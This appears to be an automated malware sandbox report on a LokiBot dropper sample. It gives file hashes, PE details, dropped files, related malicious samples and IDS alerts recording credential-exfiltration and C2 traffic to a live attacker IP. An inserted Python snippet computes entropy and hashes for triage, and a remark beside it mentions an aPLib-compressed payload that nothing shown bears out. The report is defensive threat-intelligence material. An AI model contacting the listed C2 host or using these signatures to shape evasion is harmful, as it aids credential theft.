• Successful, ratio: 99%
• Number of executed functions: 28
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12
• Excluded domains from analysis (whitelisted): l-0004.l-msedge.net, odc-web-brs.onedrive.akadns.net, client.wns.windows.com, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, fs.microsoft.com, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, db-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-db-files-geo.onedrive.akadns.net, odc-db-files-brs.onedrive.akadns.net
• Not all processes were analysed; the report is missing behaviour information.
• Report creation exceeded the maximum time and may be missing disassembly information.
• Report size getting too big: too many NtAllocateVirtualMemory calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtProtectVirtualMemory calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• VT rate limit hit for: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
Time | Type | Description
16:51:09 | API Interceptor | 68x Sleep call for process: powershell.exe modified
16:52:23 | API Interceptor | 1x Sleep call for process: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe modified
16:52:27 | API Interceptor | 14x Sleep call for process: RegAsm.exe modified
No context

Match: l-0003.l-dc-msedge.net
Associated Sample Name / URL | Detection | Context
SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe | malicious | 13.107.43.12
000211232334_33455INVOICE .vbs | malicious | 13.107.43.12
IMG_2022112022-6468.vbs | malicious | 13.107.43.12
SecuriteInfo.com.Win32.Malware-gen.5701.3804.exe | malicious | 13.107.43.12
Swift Payment Copy .xla.exe | malicious | 13.107.43.12
03231262773662516627.exe | malicious | 13.107.43.12
Cogigqkbkuvzlh.exe | malicious | 13.107.43.12
Inquiry For RE UGS - LCL - INDONESIA.exe | malicious | 13.107.43.12
AZ032441352671726.exe | malicious | 13.107.43.12
CONFD-31 PROPOSED VILLA (B+G+1+PH) + MAJLIS .exe | malicious | 13.107.43.12
Requisition Order.exe | malicious | 13.107.43.12
PRODUCTS_PROFILE.exe | malicious | 13.107.43.12
Delivery report.exe | malicious | 13.107.43.12
SecuriteInfo.com.Win32.Evo-gen.7732.16870.exe | malicious | 13.107.43.12
SecuriteInfo.com.Variant.Tedy.237947.19482.16084.exe | malicious | 13.107.43.12
Huat Tradings - Products Inquiry.exe | malicious | 13.107.43.12
Products Inquiry_Document.exe | malicious | 13.107.43.12
SecuriteInfo.com.Variant.Ransom.Gendarmerie.22.23590.8978.exe | malicious | 13.107.43.12
SecuriteInfo.com.Win32.PWSX-gen.19083.21703.exe | malicious | 13.107.43.12
Invoice Overdue & Error INV NR 522236562 DTD 25.10.2021 SK.exe | malicious | 13.107.43.12
Match: CMCSUS
Associated Sample Name / URL | Detection | Context
SecuriteInfo.com.Win32.CrypterX-gen.3242.29307.exe | malicious | 171.22.30.147
SecuriteInfo.com.Win32.PWSX-gen.7894.18041.exe | malicious | 171.22.30.164
MV COMMON CALYPSO.xls | malicious | 171.22.30.164
Order Spec.PDF.js | malicious | 45.139.105.174
iDhfdMWSQB_movar.js | malicious | 45.139.105.174
Parts_Photos.js | malicious | 45.139.105.174
wamafa.js | malicious | 45.139.105.174
LPO-17-006AD.js | malicious | 45.139.105.174
file.exe | malicious | 171.22.30.106
file.exe | malicious | 171.22.30.106
file.exe | malicious | 171.22.30.106
file.exe | malicious | 171.22.30.106
file.exe | malicious | 171.22.30.106
file.exe | malicious | 171.22.30.106
QQt3XHWcOQ.exe | malicious | 171.22.30.147
DHL Package Delivery_pdf.exe | malicious | 171.22.30.164
HpBUsbfKoI.exe | malicious | 171.22.30.164
RFQ.xls | malicious | 171.22.30.164
NEW ORDER PO137810205.xls | malicious | 171.22.30.147
file.exe | malicious | 171.22.30.106
                                                                                                          No context
                                                                                                          No context
Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1537
Entropy (8bit): 5.3478589519339295
Encrypted: false
SSDEEP: 48:MxHKX9HKx1qHiYHKhQnoPtHoxHhAHKzvFHLHKdHKBqHKs:iqX9qxwCYqhQnoPtIxHeqzNrqdq4qs
MD5: 2A63347CC5F87ABDC744C637814F0C27
SHA1: 4795E5BE85E14E9BDAACB6D00E465F238FA3601F
SHA-256: F4DCAC81A786946BE4394916C1A88F3C2EDD30660EEC190682793293D38BB865
SHA-512: 961AD4730F9361A6067005AD63EC8828EEA2755EE60754623E0879A2635ADF20BF731900936D555D6422D87AC10318A09A750C03612D12BB2C13815D95FC110E
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
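The per-file fields in these dropped-file records (Size, Entropy (8bit), Encrypted, MD5/SHA1/SHA-256/SHA-512) are the ones an analyst recomputes locally when re-triaging a sample outside the sandbox. The following Python is an added example, not code from the Joe Sandbox report or from Joe Security: it computes the same 8-bit Shannon entropy figure and hashes for a file, and applies an entropy cutoff to derive an "Encrypted" flag. The 7.5 bits-per-byte cutoff is an assumption (the report does not state the sandbox's own threshold), SSDEEP is omitted because it needs a third-party library, and the two sample inputs are constructed, not the actual dropped files.

```python
"""Dropped-file triage record: size, 8-bit Shannon entropy, "Encrypted" flag, hashes.

Added example; not code from the Joe Sandbox report. The entropy cutoff is an
assumption, and SSDEEP (shown in the report) is left out because the standard
library cannot compute it.
"""
import hashlib
import math
from collections import Counter

# Assumption: a file whose bytes carry >= 7.5 bits of entropy per byte is treated as
# packed/encrypted. Plain text sits around 4-5.5 bits; the report's fusion log is 5.35.
ENCRYPTED_THRESHOLD_BITS = 7.5


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte over the 256-symbol byte alphabet.

    0.0 for a constant byte string, 8.0 when every byte value is equally likely.
    This is the quantity the report prints as 'Entropy (8bit)'.
    """
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(data: bytes, threshold: float = ENCRYPTED_THRESHOLD_BITS) -> bool:
    """Heuristic behind an 'Encrypted' column: near-uniform bytes look ciphered or compressed."""
    return shannon_entropy_8bit(data) >= threshold


def file_record(data: bytes) -> dict:
    """Build the per-file fields the report lists (minus SSDEEP); hashes upper-case as printed there."""
    return {
        "Size (bytes)": len(data),
        "Entropy (8bit)": shannon_entropy_8bit(data),
        "Encrypted": looks_encrypted(data),
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def triage(samples: dict) -> dict:
    """Map sample name -> record. Callers alert on Encrypted=True plus a hash nobody has seen."""
    return {name: file_record(data) for name, data in samples.items()}


# Constructed inputs (not the report's dropped files): a CRLF text log shaped like the
# assembly-binding log above, and a byte-uniform blob standing in for a packed payload.
SAMPLE_TEXT_LOG = (
    b'1,"fusion","GAC",0\r\n1,"WinRT","NotApp",1\r\n'
    b'3,"System, Version=4.0.0.0, Culture=neutral",0\r\n'
) * 8
SAMPLE_UNIFORM_BLOB = bytes(range(256)) * 16


if __name__ == "__main__":
    for name, rec in triage({"text.log": SAMPLE_TEXT_LOG, "blob.bin": SAMPLE_UNIFORM_BLOB}).items():
        print(name)
        for key, value in rec.items():
            print(f"  {key}: {value:.4f}" if isinstance(value, float) else f"  {key}: {value}")
```

Reading the two records side by side shows why the flag matters: the text log lands well below the cutoff with fewer than 40 distinct byte values, while the uniform blob scores a full 8.0 bits, which is what a packed or encrypted second stage (such as the aPLib-compressed payload this sample was flagged for) typically looks like on disk. Low entropy with Malicious: true, as in the record above, points at a benign runtime artefact that the sandbox attributes to the malicious process rather than at an encrypted payload.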
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 5829
Entropy (8bit): 4.8968676994158
Encrypted: false
SSDEEP: 96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
MD5: 36DE9155D6C265A1DE62A448F3B5B66E
SHA1: 02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
SHA-256: 8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
SHA-512: C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
Malicious: false
Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15560
                                                                                                          Entropy (8bit):5.550696665565154
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:pte/e27IjK12pCbvlSBxnOulrISsFvIZA/4oXIYo:LO20B4xOulrYCilo
                                                                                                          MD5:18C379E4374BC2337F9F0D5394A3D7A1
                                                                                                          SHA1:8DEBC168CDEBAF36CAD9ED9DDD69512B742372FB
                                                                                                          SHA-256:4DD8B586651F70808C99483D02E9D19ADB96B728A402FDA3D0DE5D29FDA0936A
                                                                                                          SHA-512:5D1B414DD4F10BE191E64C203706F5BE73F976C971109B39F1483A705C082280B7274CB2FD71B683E6D1DEA4577E668E516ADC4255266BC2B00DDD8254EA8137
                                                                                                          Malicious:false
                                                                                                          Preview:@...e..................... ...........'..............@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):50
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3::
                                                                                                          MD5:871BDD96B159C14D15C8D97D9111E9C8
                                                                                                          SHA1:8CD537A621659C289F0707BAD94719B5782DDB1F
                                                                                                          SHA-256:CC2786E1F9910A9D811400EDCDDAF7075195F7A16B216DCBEFBA3BC7C4F2AE51
                                                                                                          SHA-512:E116D2D486BC802E99D5FFE83A666D5E324887A65965C7E0D90B238A4EE1DB97E28F59AED23E6F968868902D762DF06146833BE62064C4A74D7C9384DFB0C7F6
                                                                                                          Malicious:false
                                                                                                          Preview:..................................................
                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Entropy (8bit):3.7691875294894785
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                          File name:SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                                                                                                          File size:313856
                                                                                                          MD5:3039fa7b347872c33c247581a27a7560
                                                                                                          SHA1:69832bbe446653f7d10eccf07069e73230138af8
                                                                                                          SHA256:f949fda96d4810c4ffa941ecce00160b984cf7ac32cf1ca88dd4dd9583f2e480
                                                                                                          SHA512:175e3f5c4bb39e490c2b25f02e623317923b02f976f7dfc029d0213ca5d3ef2b31deef01fd9a355fdf8d5eea826130e56e45723ab2004d3797de4e11cd4053d2
                                                                                                          SSDEEP:1536:rLc62Vr2beD+oPKjg7cMpdLVPZby1U/r3EVi6DXxhoa:12VCkVUXL
                                                                                                          TLSH:81648E9A9D721284F5154D33E5BBCBA8FB125EA427AD712B2E4C7530063317B2BAF131
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c............................v4... ...@....@.. ....................... ............`................................
                                                                                                          Icon Hash:92b21472696d3916
                                                                                                          Entrypoint:0x403476
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x6385E7BE [Tue Nov 29 11:06:38 2022 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                          Instruction
                                                                                                          jmp dword ptr [00402000h]
                                                                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x341c | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x4afcc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x50000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x147c | 0x1600 | False | 0.5161576704545454 | data | 5.268731127158798 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x4000 | 0x4afcc | 0x4b000 | False | 0.050693359375 | data | 3.6559178414965716 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x50000 | 0xc | 0x200 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x4220 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | |
RT_ICON | 0x46248 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | |
RT_ICON | 0x4a470 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | |
RT_ICON | 0x4ca18 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | |
RT_ICON | 0x4dac0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | |
RT_ICON | 0x4e448 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | |
RT_GROUP_ICON | 0x4e8b0 | 0x5a | data | |
RT_VERSION | 0x4e90c | 0x4bc | data | |
RT_MANIFEST | 0x4edc8 | 0x204 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (513), with no line terminators | |
DLL | Import
mscoree.dll | _CorExeMain
                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                          192.168.2.7141.98.6.10249731802021641 11/29/22-16:52:33.757391TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249720802025381 11/29/22-16:52:28.227779TCP2025381ET TROJAN LokiBot Checkin4972080192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249717802025381 11/29/22-16:52:26.668343TCP2025381ET TROJAN LokiBot Checkin4971780192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249726802025381 11/29/22-16:52:31.339365TCP2025381ET TROJAN LokiBot Checkin4972680192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249725802024313 11/29/22-16:52:30.920170TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249725802024318 11/29/22-16:52:30.920170TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249716802024317 11/29/22-16:52:25.029133TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24971680192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249722802021641 11/29/22-16:52:29.504056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972280192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249716802024312 11/29/22-16:52:25.029133TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14971680192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249718802825766 11/29/22-16:52:27.285136TCP2825766ETPRO TROJAN LokiBot Checkin M24971880192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249719802021641 11/29/22-16:52:27.785438TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971980192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249727802825766 11/29/22-16:52:31.817491TCP2825766ETPRO TROJAN LokiBot Checkin M24972780192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249721802825766 11/29/22-16:52:28.704063TCP2825766ETPRO TROJAN LokiBot Checkin M24972180192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249730802825766 11/29/22-16:52:33.273429TCP2825766ETPRO TROJAN LokiBot Checkin M24973080192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249728802021641 11/29/22-16:52:32.198993TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249730802025381 11/29/22-16:52:33.273429TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249721802021641 11/29/22-16:52:28.704063TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972180192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249727802021641 11/29/22-16:52:31.817491TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249717802825766 11/29/22-16:52:26.668343TCP2825766ETPRO TROJAN LokiBot Checkin M24971780192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249732802021641 11/29/22-16:52:36.325135TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.7141.98.6.102
                                                                                                          141.98.6.102192.168.2.780497182025483 11/29/22-16:52:27.393637TCP2025483ET TROJAN LokiBot Fake 404 Response8049718141.98.6.102192.168.2.7
                                                                                                          192.168.2.7141.98.6.10249718802025381 11/29/22-16:52:27.285136TCP2025381ET TROJAN LokiBot Checkin4971880192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249728802825766 11/29/22-16:52:32.198993TCP2825766ETPRO TROJAN LokiBot Checkin M24972880192.168.2.7141.98.6.102
                                                                                                          141.98.6.102192.168.2.780497212025483 11/29/22-16:52:28.798694TCP2025483ET TROJAN LokiBot Fake 404 Response8049721141.98.6.102192.168.2.7
                                                                                                          141.98.6.102192.168.2.780497202025483 11/29/22-16:52:28.346106TCP2025483ET TROJAN LokiBot Fake 404 Response8049720141.98.6.102192.168.2.7
                                                                                                          192.168.2.7141.98.6.10249717802024312 11/29/22-16:52:26.668343TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14971780192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249726802021641 11/29/22-16:52:31.339365TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972680192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249723802024318 11/29/22-16:52:30.023507TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972380192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249720802024318 11/29/22-16:52:28.227779TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972080192.168.2.7141.98.6.102
                                                                                                          141.98.6.102192.168.2.780497242025483 11/29/22-16:52:30.593492TCP2025483ET TROJAN LokiBot Fake 404 Response8049724141.98.6.102192.168.2.7
                                                                                                          141.98.6.102192.168.2.780497252025483 11/29/22-16:52:31.018575TCP2025483ET TROJAN LokiBot Fake 404 Response8049725141.98.6.102192.168.2.7
                                                                                                          192.168.2.7141.98.6.10249731802025381 11/29/22-16:52:33.757391TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249722802025381 11/29/22-16:52:29.504056TCP2025381ET TROJAN LokiBot Checkin4972280192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249717802024317 11/29/22-16:52:26.668343TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24971780192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249723802024313 11/29/22-16:52:30.023507TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972380192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249716802025381 11/29/22-16:52:25.029133TCP2025381ET TROJAN LokiBot Checkin4971680192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249719802025381 11/29/22-16:52:27.785438TCP2025381ET TROJAN LokiBot Checkin4971980192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249720802024313 11/29/22-16:52:28.227779TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972080192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249725802025381 11/29/22-16:52:30.920170TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.7141.98.6.102
